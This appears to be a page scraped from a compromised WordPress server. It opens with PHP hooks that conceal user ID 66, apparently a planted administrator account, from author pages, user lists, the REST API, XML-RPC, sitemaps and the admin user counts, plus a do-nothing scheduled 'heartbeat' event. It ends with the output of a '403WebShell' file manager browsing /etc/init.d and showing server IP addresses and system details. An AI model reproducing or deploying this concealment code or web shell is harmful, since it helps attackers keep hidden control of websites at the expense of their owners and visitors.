add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / etc /init.d / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 28 2026 04:17:57
root / root
0755
acpid
2.216 KB
November 28 2023 09:13:29
root / root
0755
apache-htcacheclean
2.431 KB
March 18 2024 11:41:43
root / root
0755
apache2
7.948 KB
March 18 2024 12:35:36
root / root
0755
apparmor
3.652 KB
July 14 2024 22:22:07
root / root
0755
apport
2.222 KB
July 22 2024 14:59:07
root / root
0755
atd
1.046 KB
February 05 2022 10:00:57
root / root
0755
console-setup.sh
1.206 KB
February 26 2024 12:58:31
root / root
0755
cron
3.03 KB
August 27 2024 14:31:44
root / root
0755
cryptdisks
0.915 KB
February 26 2024 11:50:46
root / root
0755
cryptdisks-early
0.875 KB
February 26 2024 11:50:46
root / root
0755
dbus
3.078 KB
December 05 2023 15:36:45
root / root
0755
fail2ban
6.849 KB
June 10 2024 21:27:45
root / root
0755
grub-common
0.962 KB
February 23 2024 16:55:05
root / root
0755
iscsid
1.476 KB
June 05 2024 11:15:21
root / root
0755
keyboard-setup.sh
1.447 KB
February 26 2024 12:58:31
root / root
0755
kmod
1.995 KB
April 18 2024 10:06:53
root / root
0755
memcached
3.399 KB
April 01 2024 06:55:32
root / root
0755
mysql
5.476 KB
January 19 2024 14:37:05
root / root
0755
nginx
4.472 KB
November 30 2023 22:32:47
root / root
0755
open-iscsi
2.414 KB
June 05 2024 11:15:21
root / root
0755
open-vm-tools
1.803 KB
August 27 2024 14:31:44
root / root
0755
php8.3-fpm
4.193 KB
January 07 2026 08:40:32
root / root
0755
php8.4-fpm
4.193 KB
January 18 2026 14:19:44
root / root
0755
plymouth
1.354 KB
March 21 2024 13:42:02
root / root
0755
plymouth-log
0.742 KB
March 21 2024 13:42:02
root / root
0755
postfix
3.017 KB
March 05 2024 15:20:59
root / root
0755
postgresql
1.455 KB
July 31 2023 08:06:12
root / root
0755
procps
0.937 KB
March 24 2024 15:35:54
root / root
0755
qemu-guest-agent
3.044 KB
January 05 2021 22:58:07
root / root
0755
rsync
4.313 KB
August 27 2024 14:31:44
root / root
0755
screen-cleanup
1.193 KB
August 27 2024 14:31:44
root / root
0755
ssh
3.965 KB
April 03 2024 22:09:44
root / root
0755
sysstat
1.544 KB
August 27 2024 14:31:44
root / root
0755
ufw
2.042 KB
August 27 2024 14:31:44
root / root
0755
unattended-upgrades
1.358 KB
February 12 2024 17:50:35
root / root
0755
uuidd
1.275 KB
August 27 2024 14:31:44
root / root
0755
x11-common
2.697 KB
October 19 2021 09:04:11
root / root
0755
Youez - 2016 - github.com/yon3zuLinuXploit